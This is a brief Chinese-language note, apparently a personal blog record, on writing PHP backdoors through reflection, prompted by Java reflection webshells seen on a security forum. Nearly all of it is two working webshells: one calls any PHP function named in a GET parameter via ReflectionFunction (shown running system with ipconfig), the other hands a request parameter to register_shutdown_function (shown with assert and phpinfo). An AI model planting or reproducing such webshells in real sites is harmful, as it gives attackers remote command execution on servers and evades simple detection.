关于PHP反射性后门
在土司上看到别人利用java反射类来写了关于webshell的方面的,自己也没尝试去学习过关于java方面的知识
稍微看了下关于PHP的反射方面的知识,先做个记录吧
test.php?m=system&c=ipconfig
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>
test.php?e=assert&pass=phpinfo();
<?php
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);
?>